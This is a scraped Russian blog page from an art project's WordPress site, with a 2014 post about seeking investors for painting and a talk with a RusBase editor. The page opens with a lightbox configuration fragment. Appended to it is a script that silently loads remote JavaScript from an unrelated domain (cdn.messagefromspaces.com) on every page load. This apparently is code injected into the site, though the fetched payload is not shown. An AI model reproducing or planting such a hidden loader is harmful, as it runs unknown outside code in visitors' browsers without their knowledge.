, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Инвестиции в живопись

Автор: Дмитрий Алмазов | 23 Фев 2014

Проект "Лаборатория Искусства" растет и развивается. Переход от интернет магазина и обычных продаж перерастает в сообщество художников которые создают искусство!

Поиск финансирования и заинтересованного инвестора это не быстрый путь, но главное начать. Как говорится кто ищет, тот всегда найдет! Вот и я сделал первый шаг, познакомился Элиной Асфагановой редактором RusBase (ранее "Стартап Афиша") которая рассказывает о людях и их проектах нуждающихся в инвестициях. Другими словами эта площадка сводит инвестора и "Стартапера" , где любой желающий может рассказать о своем проекте для инвестора.

Такие площадки помогают разобраться в тонкостях привлечения инвестиций, взглянуть со стороны и понимать, что хочет увидеть инвестор в презентации проекта.

С Элиной Асфагановой редактором RusBase разговаривали по Скайпу, почти 40 минут. В прошлом тоже закончила художественную школу. Могу сказать, что было приятно рассказывать о своих целях, планах и достижениях, это помогает самому взглянуть по новому.

Текст беседы Вы можете найти на сайте RusBase - http://rusbase.vc/news/proekt-dlya-hudozhnikov

Если у Вас есть вопросы. предложения или Вы просто интересуетесь я всегда буду рад пообщаться и поделиться опытом.

Темы: Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress